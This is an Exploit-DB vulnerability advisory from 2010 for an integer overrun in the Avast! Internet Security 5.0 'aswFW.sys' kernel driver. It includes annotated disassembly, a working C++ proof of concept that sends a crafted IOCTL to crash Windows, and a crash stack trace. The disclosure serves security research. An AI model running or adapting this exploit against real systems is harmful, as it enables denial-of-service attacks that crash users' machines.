Avast! Internet Security 5.0 - 'aswFW.sys' Kernel Driver IOCTL Memory Pool Corruption

EDB-ID:

14533

CVE:

2010-5075

EDB Verified:

Author:

x90c

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2010-08-03

Vulnerable App: 
+-------------------------------------------------------------------------------------+
| Avast! Internet Security 5.0 'aswFW.sys' kernel driver IOCTL Memory Pool Corruption |
+-------------------------------------------------------------------------------------+

Tested Platform: Avast! Internet Security 5.0 ( Korean Trial )
Affacted File info: 'aswFW.sys' 5.0.594.0
Type: Local
Impact: Denial Of Service ( kernel panic )
Vendor: http://www.avast.com
Author: x90c of InetCop Security ( x90c.org, geinblues@gmail.com )

======================
Vulnerability Summary:
======================
The IOCTL call 0x829C0964(IOCTL_ASWFW_COMM_PIDINFO_RESULTS) of 'aswFW.sys' kernel driver 
Shiped with 'Avast! Internet Security 5.0' uses the user controlled First 4 bytes value 
To allocate a NonPagedPool without any value range checking then an integer overrun occurs.

If 'aswFW.sys' received a first 4 bytes about to '0xFFFFFFFF' with an Irp then an invalid 
Sized Memory Pool allocated.

After the invalid allocation, the kernel driver copys user controlled buffer into 
'[allocated pool+84h]' with too large copy length '0FFFFFFFFh' then the Memory Pool corrupted.

=================
Technical Detail:
=================
.text:000114B0 ; int __stdcall sub_114B0(int, PIRP Irp)
[...]
.text:00011529    mov edi, [ebp+Irp] ; edi = Irp
[...]
.text:000115A9    mov edi, [edi+0Ch] ; edi = [edi+0Ch] ( User Controlled Buffer of Irp )
[...]
.text:000115CF    sub eax, 0Ch
.text:000115D2    jz short to_IOCTL_Request ; jump into (1)
[...]
.text:00011626 to_IOCTL_Request: ; <-- (1)
.text:00011626    mov eax, [ebx+0Ch] ; eax = IOCTL Code
[...]
.text:00011629    cmp eax, edx
.text:0001162B    jz to_ioctl_code_829C0964h ; IOCTL Code == 829C0964h ? jump into (2)
[...]
.text:000116BA to_ioctl_code_829C0964h: ; <-- (2)
.text:000116BA    call sub_18D68 ; returned 0.
.text:000116BF    test eax, eax
.text:000116C1    jz short loc_116E3 ; jump into (3)
[...]
.text:000116E3 loc_116E3: ; <-- (3)
[...]
.text:000116FC    push dword ptr [edi] ; [edi] = 0FFFFFFFF ( User Controlled Buffer of Irp )
.text:000116FE    push 0
.text:00011700    call NonPagedPool_alloc_1AB32 ; call (4) 
                                                ; kd> bl
						; 0 e b2d36700     0001 (0001) aswFW+0x1700
[...]
==============================================================================================
.text:0001AB32 NonPagedPool_alloc_1AB32 proc near ; <-- (4)
[...]
.text:0001AB37    mov eax, [ebp+0Ch] ; eax = 0FFFFFFFFh ( Second param )
.text:0001AB3A    push ebx
.text:0001AB3B    push 74527741h ; Tag
.text:0001AB40    add eax, 88h ; 0FFFFFFFFh + 88h ( 0x87, result of Integer Overrun )
.text:0001AB45    push eax ; Size to allocate ( 0x87 )
.text:0001AB46    push 0 ; PoolType ( 0 = NonPagedPool )
.text:0001AB48    call ds:ExAllocatePoolWithTag ; Invalid Memory Pool allocated.
.text:0001AB4E    mov ebx, eax ; ebx = eax
[...]
.text:0001AB7F    mov eax, ebx
.text:0001AB83    retn 8 ; return with an Invalid Memory Pool. return into (5)
==============================================================================================
   
// Integer Overrun.
_87bytes_NonPagedPool = ExAllocatePoolWithTag(0, 0xFFFFFFFF + 0x88, 0x74527741); 

.text:000116E3 loc_116E3:
[...]
.text:00011705    mov esi, eax ; <-- (5) esi = eax = Invalid Memory Pool.
.text:00011707    test esi, esi
.text:00011709    jz to_Epilog ; esi == 0 ?
[...]
.text:00011727    push dword ptr [edi] ; copy size == 0FFFFFFFFh ( too large )
.text:00011729    lea eax, [esi+84h] ; eax = [esi+84h] == [Invalid Memory Pool Allocated + 84h]
.text:0001172F    push edi ; src == User Controlled Buffer of Irp ( FFFFFFFF ... )
.text:00011730    push eax ; dest == eax
.text:00011731    call memcpy ; Memory Corruption Occurs.

// Memory Pool Corruption.
memcpy((_87bytes_NonPagedPool+0x84), User Controlled Buffer of Irp, 0xFFFFFFFF);

=================
Proof of Concept:
=================

[ avast_5.0_aswFW_poc.cpp ] --
#include "stdafx.h"
#include "windows.h"
#include "winioctl.h"
#include "stdio.h"

int main(void)
{
  HANDLE hFile = NULL;
  ULONG ioctl_code = 0;
  CHAR outBuf[32];
  CHAR rpt_inBuf[102400];
  DWORD dwRet = 0, ret = 0;

  hFile = CreateFile("\\\\.\\aswFW", FILE_SHARE_READ | FILE_SHARE_WRITE,
                     0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,
                     NULL);
  if(hFile == INVALID_HANDLE_VALUE){
        fprintf(stderr, "failed to open 'aswFW.sys' kernel driver!\n");
	return(-1);
  } 

  rpt_inBuf[0] = '\xff'; // first 4 byte wiil uses calculate 
  rpt_inBuf[1] = '\xff'; // allication size of ExAllocatePoolWithTag.
  rpt_inBuf[2] = '\xff'; // and it is [Irp+0Ch] as User Controlled Buffer.
  rpt_inBuf[3] = '\xff';
  memset((rpt_inBuf+4), 0xff, 102394);

  // IOCTL Code = 0x829C0964 ( IOCTL_ASWFW_COMM_PIDINFO_RESULTS )
  // ( another IOCTL Code also vulnerable )
  ret = DeviceIoControl(hFile, 0x829C0964,
        (PVOID)rpt_inBuf, 102398, outBuf, 32, &dwRet, NULL); 

  return 0;
}
// -- eoc --

===============
Exploitability:
===============
It's hard to exploit because 'too large copy length'. I saw *once eip register pointers 
At 0x1000 but the controlling eip register is not consistent. ( DoS )
--
STACK_TEXT:  
f8ac5944 804f9bad 00000003 f8ac5ca0 00000000 nt!RtlpBreakWithStatusInstruction
f8ac5990 804fa79a 00000003 00001000 00001000 nt!KiBugCheckDebugBreak+0x19
f8ac5d70 805426bb 0000000a 00001000 00000009 nt!KeBugCheck2+0x574
f8ac5d70 00001000 0000000a 00001000 00000009 nt!KiTrap0E+0x233
WARNING: Frame IP not in any known module. Following frames may be wrong.
f8ac5e00 f871bf6c 00000001 00000200 0000011c 0x1000
f8ac5e58 8054357d 81d6fd98 81e72af8 00010009 i8042prt!I8042KeyboardInterruptService+0x100
f8ac5e58 804fcd56 81d6fd98 81e72af8 00010009 nt!KiInterruptDispatch+0x3d
f8ac5f00 f8502ab6 81da5b60 0006bd78 81da5bb8 nt!KeRemoveByKeyDeviceQueue+0x2e
f8ac5f20 f850423b 81daa0e8 81da5bb8 81da5c60 atapi!GetNextLuRequest+0x7c
f8ac5f54 f8504c8e 81df7e70 81da5c60 f8ac5fcf atapi!IdeProcessCompletedRequest+0x1a3
f8ac5fd0 80543bbd 81daa0a4 81daa030 00000000 atapi!IdePortCompletionDpc+0x204
f8ac5ff4 8054388a b20e7b44 00000000 00000000 nt!KiRetireDpcList+0x46
f8ac5ff8 b20e7b44 00000000 00000000 00000000 nt!KiDispatchInterrupt+0x2a
8054388a 00000000 00000009 bb835675 00000128 0xb20e7b44
--

=========
Solution:
=========
Not yet.

==============
Vendor Status:
==============
2010/08/02 - Vendor notified.
2010/08/03 - Public Disclosed.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services